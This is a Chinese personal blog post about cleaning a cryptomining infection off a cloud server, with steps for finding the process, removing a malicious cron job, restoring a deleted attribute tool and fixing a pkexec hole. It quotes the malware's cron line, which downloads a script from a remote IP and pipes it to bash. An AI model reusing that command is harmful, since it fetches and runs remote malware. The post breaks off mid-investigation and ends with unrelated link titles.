记录第一次处理,服务器也被挖矿程序入侵,原本是不想处理的,但是阿里云一直给我警告,然后再不处理服务器给我停了,这导致我立马打开电脑进行处理,怎么处理的我也不会啊,就一直百度,还是解决了(应该是解决了吧)
1、使用top命令查看可疑进程
top
2、去我们的异常事件的目录下检查可疑程序,然后删除
cd /var/tmp/.crypto/.../rm -f httpd
3、我看网上说存在定时任务自动入侵,的,使用如下命令查看是否存在定时任务
crontab -l#如下是定时任务*/30 * * * * /bin/cdz -fsSL http://104.192.82.138/s3f1015/a/a.sh | bash > /dev/null 2>&1
4、真的存在者玩意儿,然后使用使用- e进入定时任务的编辑框,使用dd命令删除里面内容,然后wq! 强制保存退出
5、我以为已经删除了,再次查看,定时任务依旧存在,任务内容依旧存在,我裂开了啊,而且给我弹出来下边这个
我没有权限,删除定时任务,wtf,继续百度得到以下步骤
6、先进入/var/spool下查看cron目录是正常的,但是在cron里面没有权限建立文件这个根源可以尝试先在/var/spool/cron目录下用vim编辑一个测试文件,看是否可以保存在这个cron目录下,如果无法保存提示权限问题 。
那么可能目录有什么特殊的地方,root用户也被约束了
7、然后执行 + 路径查看是否有特殊的属性
lsattr /var/spool/cron/
发现,真尼玛的存在特殊权限了
8、接下来说是除去这个特殊属性即可,使用命令
lsattr /var/spool/cron/
经过执行的得到如下结果
艹,命令被删除了,这个垃圾的违法分子真实绝了
9、通过一顿百度找到解决办法,就是如下步骤,目的是安装
yum remove e2fsprogs//此步骤注意同时会删掉很多依赖的包yum -y install 上一步被删掉的依赖包yum -y install e2fsprogs
以上三个操作执行完毕后,命令就安装好,呜呜!
10、然后执行命令
【记录_第一次解决挖矿程序入侵问题】定时任务终于被删除了,真糟心啊~
11、然后就是去阿里云的控制台检测以下,发现存在漏洞,说的是的一堆,大概意思就是当前服务器有个漏洞,违法分子可以通过这个漏洞获取服务器的root权限,可以执行如下命令解决
[root@songqixiang ...]# chmod 0755 /usr/bin/pkexec
12、然后就完事儿,第一次遇见不知道是不是解决了,如果没决绝,服务器不会真的给我停了叭!
13、反正最后是这个样子,如果真没解决我也没招了,还得请大佬看看吧!
追加:上面所有操作搞完后,晚上阿里云又给我发短信了,说发现挖矿程序,我真是裂开了啊,心态崩了,又经过一段搜,对这个挖矿程序做了如下的处理!
出现问题:服务器内存异常
Top面板查看服务器内存情况时,发现有不知去向的内存 。一部分内存空间观测不到程序的占用 。
1、Top面板上展示异常
Top面板展示刚才输入的top命令异常:top命令被篡改为top.
2、Top命令被篡改
进入目录/usr/bin中查找top可执行文件:
ll /usr/bin/top*
结果如下:
通过文件大小判断,top命令被篡改,看看里面内容:
- win7中文语言包环境下安装软件乱码的解决方法
- 母婴行业转型过程中的痛点如何解决
- nodejs 4.4. Express写接口---使用CORS解决跨域问题
- JFX11+Maven+IDEA 发布跨平台应用的完美解决方案
- 铛~铛~铛【我身边的戴尔企业级解决方案】
- JFX11+IDEA跨平台打包发布的完美解决办法
- 【Hybrid App】关于Hybrid App技术解决方案的选择
- 【已解决】web.py与react
- 用on给动态添加的元素绑定hover事件,没有生效的解决
- vue.js第一次加载会触发哪几个钩子函数